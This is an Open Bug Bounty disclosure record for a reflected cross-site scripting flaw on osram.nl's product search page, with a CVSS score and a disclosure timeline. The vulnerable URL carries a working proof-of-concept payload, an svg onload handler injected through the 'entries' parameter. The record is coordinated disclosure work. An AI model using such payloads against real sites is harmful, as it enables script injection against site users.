osram.nl XSS vulnerability

2016-06-22T12:31:00
ID OBB:160784
Type openbugbounty
Reporter et
Modified 2018-03-15T02:32:00

Description

Open Bug Bounty ID: OBB-160784

Description| Value
---|---
Affected Website:| osram.nl
Vulnerable Application:| Custom Code
Vulnerability Type:| XSS (Cross Site Scripting) / CWE-79
CVSSv3 Score:| 6.1 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N]
Remediation Guide:| OWASP XSS Prevention Cheat Sheet

Vulnerable URL:
http://www.osram.nl/osram_bx/nl/search/product_search.jsp?dd_classification_id=GPS01_1027370&df;_ZPIM1FD00710_max_d=201&df;_ZPIM1FD00710_min_d=3&lal;=ZPIM1FD00711%2CZPIM1FD10086%2CZPIM1FD00246%2CZPIM1FD00710%2CZPIM1FD00746&action;=search&entries;=1%22--%3E%3Csvg/onload=;prompt(/OPENBUGBOUNTY/);%3E50&form;_classification_id=GPS01_1027370&submit;_from=form&sort;=df_ZPIM1FD00711_min_d%20asc
Coordinated Disclosure Timeline

Description| Value
---|---
Vulnerability Reported:| 22 June, 2016 12:31 GMT
Vulnerability Verified:| 22 June, 2016 12:33 GMT
Website Operator Notified:| 22 June, 2016 12:33 GMT
Vulnerability Published:| 22 June, 2016 12:33 GMT[without any technical details]
Vulnerability Fixed:| 15 March, 2018 02:32 GMT
Public Disclosure:| 15 March, 2018 02:32 GMT